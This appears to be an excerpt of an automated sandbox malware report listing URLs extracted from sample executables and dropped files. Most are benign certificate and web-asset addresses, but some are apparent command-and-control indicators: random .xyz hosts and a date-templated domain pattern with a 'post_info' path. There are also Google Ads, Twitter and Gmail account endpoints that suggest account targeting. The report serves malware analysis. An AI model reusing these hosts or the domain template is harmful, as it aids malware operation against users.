Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0R
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://ocsp.msocsp.com0
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: FileSetup-v17.04.41.exe | String found in binary or memory: http://ocsp.thawte.com0
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
Source: download_engine.dll.4.dr | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: download_engine.dll.4.dr | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 6852B33702F6B3BD.exe, 00000004.00000003.304868433.0000000003CBF000.00000004.00000001.sdmp | String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: FileSetup-v17.04.41.exe | String found in binary or memory: http://sf.symcb.com/sf.crl0f
Source: FileSetup-v17.04.41.exe | String found in binary or memory: http://sf.symcb.com/sf.crt0
Source: FileSetup-v17.04.41.exe | String found in binary or memory: http://sf.symcd.com0&
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xCDZ.img?h=75&w=100
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xMWp.img?h=75&w=100
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xssM.img?h=75&w=100
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xzm6.img?h=250&w=30
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yFoT.img?h=75&w=100
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
Source: MiniThunderPlatform.exe.4.dr | String found in binary or memory: http://store.paycenter.uc.cn
Source: MiniThunderPlatform.exe.4.dr | String found in binary or memory: http://store.paycenter.uc.cnmail-attachment.googleusercontent.com
Source: FileSetup-v17.04.41.exe | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: FileSetup-v17.04.41.exe | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: FileSetup-v17.04.41.exe | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 6852B33702F6B3BD.exe, 00000004.00000003.304890427.0000000003D65000.00000004.00000001.sdmp | String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293176364.000000000364F000.00000004.00000001.sdmp | String found in binary or memory: http://www.interestvideo.com/video1.php
Source: 6852B33702F6B3BD.exe, 00000004.00000003.305037928.0000000003CB2000.00000004.00000001.sdmp | String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://www.msn.com
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://www.msn.com/
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
Source: 1611946678493.exe, 0000000B.00000002.283027571.0000000000198000.00000004.00000010.sdmp | String found in binary or memory: http://www.nirsoft.net
Source: 1611946678493.exe, 1611946678493.exe.4.dr | String found in binary or memory: http://www.nirsoft.net/
Source: FileSetup-v17.04.41.exe | String found in binary or memory: http://www.openssl.org/support/faq.html
Source: FileSetup-v17.04.41.exe, download_engine.dll.4.dr | String found in binary or memory: http://www.openssl.org/support/faq.html....................
Source: download_engine.dll.4.dr | String found in binary or memory: http://www.xunlei.com/
Source: download_engine.dll.4.dr | String found in binary or memory: http://www.xunlei.com/GET
Source: 6852B33702F6B3BD.exe | String found in binary or memory: http://www.youtube.com
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmp | String found in binary or memory: http://www.youtube.com//a
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmp | String found in binary or memory: http://www.youtube.comz/
Source: ecvAA35.tmp.11.dr | String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;g
Source: ecvAA35.tmp.11.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166
Source: ecvAA35.tmp.11.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674
Source: 6852B33702F6B3BD.exe, 00000004.00000003.383784768.0000000002227000.00000004.00000040.sdmpString found in binary or memory: https://A5D4CE54CC78B3CA.xyz/
Source: 6852B33702F6B3BD.exe, 00000004.00000003.324597044.0000000000792000.00000004.00000001.sdmp, Localwebdata1611946694399.4.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/_/rpc/GaiaInfoService/Get?authuser=0&rpcTrackingId=GaiaInfoService.Get%3A
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/_/rpc/UserByGaiaService/Get?authuser=0&rpcTrackingId=UserByGaiaService.Ge
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/_/rpc/UserCustomerAccessService/List?authuser=0&rpcTrackingId=UserCustome
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/selectaccount
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/selectaccountocation:
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.comsec-fetch-dest:
Source: ecvAA35.tmp.11.drString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt
Source: ecvAA35.tmp.11.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=
Source: ecvAA35.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: ecvAA35.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: ecvAA35.tmp.11.drString found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://api.twitter.com/1.1/statuses/update.json
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://api.twitter.com/1.1/statuses/update.jsoninclude_profile_interstitial_type=1&include_blocking
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://apis.google.com
Source: ecvAA35.tmp.11.drString found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
Source: ecvAA35.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
Source: ecvAA35.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
Source: ecvAA35.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
Source: ecvAA35.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
Source: ecvAA35.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
Source: ecvAA35.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
Source: ecvAA35.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
Source: ecvAA35.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
Source: ecvAA35.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
Source: ecvAA35.tmp.11.drString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
Source: ecvAA35.tmp.11.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: 6852B33702F6B3BD.exe, 00000004.00000003.324597044.0000000000792000.00000004.00000001.sdmp, Localwebdata1611946694399.4.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 6852B33702F6B3BD.exe, 00000005.00000003.287736856.0000000002372000.00000004.00000040.sdmpString found in binary or memory: https://chrome.google.com/webstore
Source: 6852B33702F6B3BD.exe, 00000005.00000003.277967504.0000000003E5B000.00000004.00000001.sdmp, background.js.5.drString found in binary or memory: https://chrome.google.com/webstore/category/extension
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278524081.000000000237C000.00000004.00000001.sdmpString found in binary or memory: https://chrome.google.com/webstoreAAjb
Source: 6852B33702F6B3BD.exeString found in binary or memory: https://clients2.google.com/service/update2/cr
Source: 6852B33702F6B3BD.exe, 00000005.00000003.287876756.0000000003DD0000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000003.287851020.0000000003DDB000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000003.287736856.0000000002372000.00000004.00000040.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 6852B33702F6B3BD.exe, 00000005.00000003.287833605.000000000237D000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx1
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx:-
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxI
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxp1M
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://content.googleapis.com
Source: ecvAA35.tmp.11.drString found in binary or memory: https://contextual.media.net/
Source: ecvAA35.tmp.11.drString found in binary or memory: https://contextual.media.net/48/nrrV18753.js
Source: ecvAA35.tmp.11.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
Source: ecvAA35.tmp.11.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: ecvAA35.tmp.11.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ecvAA35.tmp.11.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386867102.000000000340F000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293176364.000000000364F000.00000004.00000001.sdmpString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: ecvAA35.tmp.11.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
Source: FileSetup-v17.04.41.exeString found in binary or memory: https://d.symcb.com/cps0%
Source: FileSetup-v17.04.41.exeString found in binary or memory: https://d.symcb.com/rpa0
Source: ecvAA35.tmp.11.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: ecvAA35.tmp.11.drString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD3B6173
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.278094503.0000000003E07000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/C/u
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.278094503.0000000003E07000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/
Source: 6852B33702F6B3BD.exeString found in binary or memory: https://drive.google.com/?usp=chrome_app
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/?usp=chrome_appk/B
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/F/x
Source: 6852B33702F6B3BD.exeString found in binary or memory: https://drive.google.com/drive/settings
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/drive/settingsawl7
Source: 6852B33702F6B3BD.exe, 00000004.00000003.324597044.0000000000792000.00000004.00000001.sdmp, Localwebdata1611946694399.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 6852B33702F6B3BD.exe, 00000004.00000003.324597044.0000000000792000.00000004.00000001.sdmp, Localwebdata1611946694399.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 6852B33702F6B3BD.exe, 00000004.00000003.324597044.0000000000792000.00000004.00000001.sdmp, Localwebdata1611946694399.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://feedback.googleusercontent.com
Source: ecvAA35.tmp.11.drString found in binary or memory: https://fonts.googleapis.com/css?family=Google
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com;
Source: ecvAA35.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
Source: ecvAA35.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
Source: ecvAA35.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
Source: ecvAA35.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com;
Source: 6852B33702F6B3BD.exe, 00000005.00000002.289473954.000000000087B000.00000004.00000020.sdmpString found in binary or memory: https://fsfba021a5a6662.xyz/
Source: ecvAA35.tmp.11.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: ecvAA35.tmp.11.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: 6852B33702F6B3BD.exeString found in binary or memory: https://hangouts.google.com/
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: ecvAA35.tmp.11.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: ecvAA35.tmp.11.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: ecvAA35.tmp.11.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: ecvAA35.tmp.11.drString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: ecvAA35.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5
Source: ecvAA35.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937
Source: ecvAA35.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css
Source: ecvAA35.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ
Source: ecvAA35.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.js
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://mail.google.com/mail
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://mail.google.com/mail/#settings
Source: ecvAA35.tmp.11.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: ecvAA35.tmp.11.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
Source: ecvAA35.tmp.11.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
Source: ecvAA35.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-22-21-45-19/PreSignInSettingsConfig.json
Source: ecvAA35.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-24-17-35-16/PreSignInSettingsConfig.json?One
Source: ecvAA35.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update10.xml?OneDriveUpdate=79d8737dc86cbccc6833c
